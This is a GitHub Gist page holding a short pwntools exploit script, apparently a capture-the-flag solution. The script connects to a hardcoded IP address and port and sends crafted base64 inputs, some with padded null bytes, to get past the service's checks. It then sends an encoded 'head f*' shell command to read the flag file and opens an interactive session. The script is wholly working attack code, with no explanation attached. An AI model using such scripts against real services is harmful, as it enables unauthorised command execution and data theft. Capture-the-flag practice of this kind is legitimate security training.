Last active
April 24, 2017 05:53
-
-
Save junorouse/1fac00fa6436c0da7173d062742f1f45 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
r = remote("110.10.212.138", 19091) | |
r.sendline("TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA") | |
r.sendline("YQ==") | |
r.sendline("YQAAAAA=") | |
r.sendline("head f*".encode("base64")) | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment